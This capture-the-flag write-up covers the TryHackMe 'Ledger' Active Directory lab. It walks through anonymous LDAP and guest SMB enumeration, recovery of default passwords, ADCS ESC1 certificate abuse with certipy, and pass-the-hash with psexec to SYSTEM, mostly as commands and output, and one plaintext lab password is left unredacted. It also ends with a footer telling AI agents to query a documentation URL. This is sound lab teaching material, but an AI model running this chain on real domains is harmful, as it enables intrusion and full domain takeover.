# Ledger ## SUMMARY Ledger is a Hard machine from TryHackMe where the goal is to gain administrative privileges of the machine. For initial access, the LDAP service allows for anonymous binds, allowing anyone to query the domain for information. We find a default password for 2 users where one user has RDP access. To escalate our privileges, we take advantage of the ESC1 vulnerability in the certificate template, allowing us to supply an arbitrary SAN which allows us to impersonate a user in the `Domain Admins` group. ## Enumeration ### NMAP Doing our enumeration, we find several ports open such as Kerberos (port `88`), LDAP (port `389`), Web-related services (port `80` and `443`), RPC (port `135`), SMB (port `445`), and RDP port on port `3389` which may indicate that this is a domain controller. We also have the domain name which is `labyrinth.thm.local` so we can add it to our `/etc/hosts`. ``` $ sudo nmap -sC -sV 10.201.45.90 -oA nmap/port Starting Nmap 7.95 ( ) at 2025-08-16 10:16 PST Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 72.06% done; ETC: 10:17 (0:00:17 remaining) Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 78.57% done; ETC: 10:17 (0:00:05 remaining) Nmap scan report for 10.201.45.90 Host is up (0.33s latency). Not shown: 986 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-16 02:17:36Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name) |_ssl-date: 2025-08-16T02:19:25+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=labyrinth.thm.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:labyrinth.thm.local | Not valid before: 2025-08-16T01:37:50 |_Not valid after: 2026-08-16T01:37:50 443/tcp open ssl/http Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server |_ssl-date: 2025-08-16T02:19:24+00:00; 0s from scanner time. |_http-server-header: Microsoft-IIS/10.0 | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=thm-LABYRINTH-CA | Not valid before: 2023-05-12T07:26:00 |_Not valid after: 2028-05-12T07:35:59 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=labyrinth.thm.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:labyrinth.thm.local | Not valid before: 2025-08-16T01:37:50 |_Not valid after: 2026-08-16T01:37:50 |_ssl-date: 2025-08-16T02:19:24+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=labyrinth.thm.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:labyrinth.thm.local | Not valid before: 2025-08-16T01:37:50 |_Not valid after: 2026-08-16T01:37:50 |_ssl-date: 2025-08-16T02:19:25+00:00; 0s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=labyrinth.thm.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:labyrinth.thm.local | Not valid before: 2025-08-16T01:37:50 |_Not valid after: 2026-08-16T01:37:50 |_ssl-date: 2025-08-16T02:19:24+00:00; 0s from scanner time. 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=labyrinth.thm.local | Not valid before: 2025-08-15T01:46:36 |_Not valid after: 2026-02-14T01:46:36 |_ssl-date: 2025-08-16T02:19:24+00:00; 0s from scanner time. Service Info: Host: LABYRINTH; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-08-16T02:18:25 |_ start_date: N/A Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 194.78 seconds ``` ### SMB Checking for SMB anonymous sessions, we find it fails. ``` $ smbmap -H 10.201.45.90 ________ ___ ___ _______ ___ ___ __ _______ /" )|" \\ /" || _ "\\ |" \\ /" | /""\\ | __ "\\ (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :) \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/ __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| / /" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\ (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com [*] Detected 1 hosts serving SMB [*] Established 1 SMB connections(s) and 0 authenticated session(s) [!] Access denied on 10.201.45.90, no fun for you... [*] Closed 1 connections ``` Same with `rpcclient`: ``` $ rpcclient -U "" 10.201.45.90 -N rpcclient $> enumdomusers result was NT_STATUS_CONNECTION_DISCONNECTED rpcclient $> exit ``` Testing for guest authentication, we find we have read access to the `IPC$` share. ``` $ netexec smb 10.201.45.90 -u 'a' -p '' --shares SMB 10.201.45.90 445 LABYRINTH [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False) SMB 10.201.45.90 445 LABYRINTH [+] thm.local\\a: (Guest) SMB 10.201.45.90 445 LABYRINTH [*] Enumerated shares SMB 10.201.45.90 445 LABYRINTH Share Permissions Remark SMB 10.201.45.90 445 LABYRINTH ----- ----------- ------ SMB 10.201.45.90 445 LABYRINTH ADMIN$ Remote Admin SMB 10.201.45.90 445 LABYRINTH C$ Default share SMB 10.201.45.90 445 LABYRINTH IPC$ READ Remote IPC SMB 10.201.45.90 445 LABYRINTH NETLOGON Logon server share SMB 10.201.45.90 445 LABYRINTH SYSVOL Logon server share ``` This allows for RID cycling which can allow us to brute-force users within the domain. This can be done with `netexec` with the `--rid-brute` flag. ``` $ netexec smb 10.201.45.90 -u 'a' -p '' --rid-brute SMB 10.201.45.90 445 LABYRINTH [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False) SMB 10.201.45.90 445 LABYRINTH [+] thm.local\\a: (Guest) SMB 10.201.45.90 445 LABYRINTH 498: THM\\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 500: THM\\Administrator (SidTypeUser) SMB 10.201.45.90 445 LABYRINTH 501: THM\\Guest (SidTypeUser) SMB 10.201.45.90 445 LABYRINTH 502: THM\\krbtgt (SidTypeUser) SMB 10.201.45.90 445 LABYRINTH 512: THM\\Domain Admins (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 513: THM\\Domain Users (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 514: THM\\Domain Guests (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 515: THM\\Domain Computers (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 516: THM\\Domain Controllers (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 517: THM\\Cert Publishers (SidTypeAlias) SMB 10.201.45.90 445 LABYRINTH 518: THM\\Schema Admins (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 519: THM\\Enterprise Admins (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 520: THM\\Group Policy Creator Owners (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 521: THM\\Read-only Domain Controllers (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 522: THM\\Cloneable Domain Controllers (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 525: THM\\Protected Users (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 526: THM\\Key Admins (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 527: THM\\Enterprise Key Admins (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 553: THM\\RAS and IAS Servers (SidTypeAlias) SMB 10.201.45.90 445 LABYRINTH 571: THM\\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.201.45.90 445 LABYRINTH 572: THM\\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.201.45.90 445 LABYRINTH 1008: THM\\LABYRINTH$ (SidTypeUser) SMB 10.201.45.90 445 LABYRINTH 1109: THM\\DnsAdmins (SidTypeAlias) SMB 10.201.45.90 445 LABYRINTH 1110: THM\\DnsUpdateProxy (SidTypeGroup) SMB 10.201.45.90 445 LABYRINTH 1113: THM\\greg (SidTypeUser) [...SNIP...] ``` We can use the following `grep` and `cut` commands to parse the output from `netexec`. ``` grep netexec_output.txt | cut -d\\\\ -f2 | cut -d" " -f1 > users.txt ``` ### AS-REP Roasting (Failed) We can then use impacket’s `GetNPUsers.py` and we should be able to retrieve a few users who have Kerberos pre-authentication disabled. ``` $ impacket-GetNPUsers thm.local/ -dc-ip 10.201.45.90 -usersfile users.txt -format hashcat -outputfile hashes.txt Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User LABYRINTH$ doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User greg doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User SHANA_FITZGERALD doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User CAREY_FIELDS doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User DWAYNE_NGUYEN doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User BRANDON_PITTMAN doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User BRET_DONALDSON doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User VAUGHN_MARTIN doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User DICK_REEVES doesn't have UF_DONT_REQUIRE_PREAUTH set [...SNIP...] ``` Trying to crack the hashes proved to be a dead end so far. ### LDAP We can then pivot into checking LDAP, specifically if they allow anonymous binding. In this case, it is allowed. ``` $ ldapsearch -x -H ldap://10.201.45.90 -s base # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: ALL # # dn: domainFunctionality: 7 forestFunctionality: 7 domainControllerFunctionality: 7 rootDomainNamingContext: DC=thm,DC=local ldapServiceName: thm.local:labyrinth$@THM.LOCAL isGlobalCatalogReady: TRUE supportedSASLMechanisms: GSSAPI supportedSASLMechanisms: GSS-SPNEGO supportedSASLMechanisms: EXTERNAL supportedSASLMechanisms: DIGEST-MD5 [...SNIP...] ``` We can then query for the LDAP information using the following command. ``` $ ldapsearch -x -H ldap://10.201.45.90 -b "dc=thm,dc=local" > ldapsearch.txt ``` Reading through the output, we find 2 users that have a peculiar description. ``` [...SNIP...] # IVY_WILLIS, HRE, Tier 1, thm.local dn: CN=IVY_WILLIS,OU=HRE,OU=Tier 1,DC=thm,DC=local objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: IVY_WILLIS sn: IVY_WILLIS description: Please change it: ...REDACTED... [...SNIP...] # SUSANNA_MCKNIGHT, Test, ITS, Tier 1, thm.local dn: CN=SUSANNA_MCKNIGHT,OU=Test,OU=ITS,OU=Tier 1,DC=thm,DC=local objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: SUSANNA_MCKNIGHT sn: SUSANNA_MCKNIGHT description: Please change it: ...REDACTED... [...SNIP...] ``` Testing if it works, we can verify that it does. ``` $ netexec smb 10.201.45.90 -u SUSANNA_MCKNIGHT -p '...REDACTED...' SMB 10.201.45.90 445 LABYRINTH [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False) SMB 10.201.45.90 445 LABYRINTH [+] thm.local\\SUSANNA_MCKNIGHT:CHANGEME2023! $ netexec smb 10.201.45.90 -u IVY_WILLIS -p '...REDACTED...' SMB 10.201.45.90 445 LABYRINTH [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False) SMB 10.201.45.90 445 LABYRINTH [+] thm.local\\IVY_WILLIS:CHANGEME2023! ``` We can then use `bloodhound-python` to query the domain using the valid credentials. ``` $ bloodhound-python -u IVY_WILLIS -p '...REDACTED...' -d thm.local -ns 10.201.45.90 -c All --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: thm.local INFO: Getting TGT for user INFO: Connecting to LDAP server: labyrinth.thm.local INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: labyrinth.thm.local INFO: Found 493 users INFO: Found 52 groups INFO: Found 2 gpos INFO: Found 222 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: labyrinth.thm.local WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out. INFO: Done in 05M 35S INFO: Compressing output into 20250816113835_bloodhound.zip ``` This creates a ZIP file which can then be ingested by BloodHound. ### BloodHound Querying for all domain admins, we find that are 3 non-standard domain admins.
We also find that `SUSANNA_MCKNIGHT` is part of the `Remote Management Users` and `Remote Desktop Users`. We can use this user to gain access since we have RDP open on the machine.
We find that `IVY_WILLIS` is part of the `Remote Management Users` group since the `Domain Users` group is a member of the former group.
### RDP We can connect to the machine using `xfreerdp3`. ``` $ xfreerdp3 /u:SUSANNA_MCKNIGHT /p:...REDACTED... /v:10.201.45.90 [12:11:16:249] [89003:00015bac] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found [12:11:16:249] [89003:00015bac] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found [12:11:18:926] [89003:00015bac] [WARN][com.freerdp.crypto] - [verify_cb]: Certificate verification failure 'self-signed certificate (18)' at stack position 0 [12:11:18:926] [89003:00015bac] [WARN][com.freerdp.crypto] - [verify_cb]: CN = labyrinth.thm.local ``` We also get the flag on the user’s desktop.
## Privilege Escalation Enumerating the list of users that have had accessed the machine, we find `BRADLEY_ORTIZ` as another possible user. This user also has domain admin privileges within the domain.
Earlier, we found port `443` running. Checking the certificate, we find that there is the common name of `thm-LABYRINTH-CA` which may indicate that ADCS is running.
We can use a tool like `certipy-ad` to enumerate ADCS. ``` $ certipy-ad -debug find -u 'SUSANNA_MCKNIGHT@thm.local' -p "...REDACTED..." -dc-ip 10.201.107.76 -target labyrinth.thm.local -dc-host thm.local Certipy v5.0.2 - by Oliver Lyak (ly4k) [+] Nameserver: '10.201.107.76' [+] DC IP: '10.201.107.76' [+] DC Host: 'thm.local' [+] Target IP: '10.201.107.76' [+] Remote Name: 'labyrinth.thm.local' [+] Domain: 'THM.LOCAL' [+] Username: 'SUSANNA_MCKNIGHT' [+] Authenticating to LDAP server using NTLM authentication [+] Using NTLM signing: False (LDAP signing: True, SSL: True) [+] Using channel binding signing: True (LDAP channel binding: True, SSL: True) [+] Using LDAP channel binding for NTLM authentication [+] LDAP NTLM authentication successful [+] Bound to ldaps://10.201.107.76:636 - ssl [+] Default path: DC=thm,DC=local [+] Configuration path: CN=Configuration,DC=thm,DC=local [*] Finding certificate templates [*] Found 37 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 14 enabled certificate templates [*] Finding issuance policies [*] Found 21 issuance policies [*] Found 0 OIDs linked to templates [...SNIP...] ``` Checking available certificate templates, we found that the `ServerAuth` template is vulnerable to ESC1. The ESC1 vulnerability stems from allowing any low-privileged user to request for a certificate, and similarly supply an arbitrary SAN, allowing for direct privilege escalation. We can use `certipy` with the `req` module to request for a certificate as the low-privileged user but the UPN is arbitrarily supplied to be the administrator, including the SID. ``` $ certipy-ad -debug req -u 'SUSANNA_MCKNIGHT@thm.local' -p '...REDACTED...' -dc-ip 10.201.107.76 -target labyrinth.thm.local -ca 'thm-LABYRINTH-CA' -template ServerAuth -upn 'bradley_ortiz@thm.local' -sid 'S-1-5-21-[...SNIP...]-1358' Certipy v5.0.2 - by Oliver Lyak (ly4k) [+] DC host (-dc-host) not specified. Using domain as DC host [+] Nameserver: '10.201.107.76' [+] DC IP: '10.201.107.76' [+] DC Host: 'THM.LOCAL' [+] Target IP: None [+] Remote Name: 'labyrinth.thm.local' [+] Domain: 'THM.LOCAL' [+] Username: 'SUSANNA_MCKNIGHT' [+] Trying to resolve 'labyrinth.thm.local' at '10.201.107.76' [+] Generating RSA key [*] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.201.107.76[\\pipe\\cert] [+] Connected to endpoint: ncacn_np:10.201.107.76[\\pipe\\cert] [*] Request ID is 27 [*] Successfully requested certificate [*] Got certificate with UPN 'bradley_ortiz@thm.local' [+] Found SID in SAN URL: 'S-1-5-21-[...SNIP...]-1358' [+] Found SID in security extension: 'S-1-5-21-[...SNIP...]-1358' [*] Certificate object SID is 'S-1-5-21-[...SNIP...]-1358' [*] Saving certificate and private key to 'bradley_ortiz.pfx' [+] Attempting to write data to 'bradley_ortiz.pfx' [+] Data written to 'bradley_ortiz.pfx' [*] Wrote certificate and private key to 'bradley_ortiz.pfx' ``` We can then use `certipy` with the `auth` module to authenticate as the Administrator with the PFX file we got earlier. This would then request for a TGT which would allow us to also retrieve the admin user’s NTLM hash. ``` $ certipy-ad auth -pfx bradley_ortiz.pfx -dc-ip 10.201.107.76 Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: 'bradley_ortiz@thm.local' [*] SAN URL SID: 'S-1-5-21-[...SNIP...]-1358' [*] Security Extension SID: 'S-1-5-21-[...SNIP...]-1358' [*] Using principal: 'bradley_ortiz@thm.local' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'bradley_ortiz.ccache' [*] Wrote credential cache to 'bradley_ortiz.ccache' [*] Trying to retrieve NT hash for 'bradley_ortiz' [*] Got hash for 'bradley_ortiz@thm.local': ...REDACTED... ``` Since we have the admin NTLM hash, we can use `impacket` with the `psexec` module to gain a shell as `nt authority\system`. ``` $ impacket-psexec thm.local/bradley_ortiz@10.201.107.76 -hashes :...REDACTED... Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on 10.201.107.76..... [*] Found writable share ADMIN$ [*] Uploading file lHaVLFYz.exe [*] Opening SVCManager on 10.201.107.76..... [*] Creating service bSay on 10.201.107.76..... [*] Starting service bSay..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.4377] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system ``` We get the root flag in `C:\Users\Administrator\Desktop`. ``` C:\Users\Administrator\Desktop> dir Volume in drive C has no label. Volume Serial Number is A8A4-C362 Directory of C:\Users\Administrator\Desktop 05/31/2023 08:18 AM . 05/31/2023 08:18 AM .. 06/21/2016 03:36 PM 527 EC2 Feedback.website 06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website 05/31/2023 07:33 AM 29 root.txt 3 File(s) 1,110 bytes 2 Dir(s) 12,511,961,088 bytes free C:\Users\Administrator\Desktop> type root.txt THM{...REDACTED...} C:\Users\Administrator\Desktop> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mknukn.gitbook.io/infosec-blog/ctfs/tryhackme/ledger.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.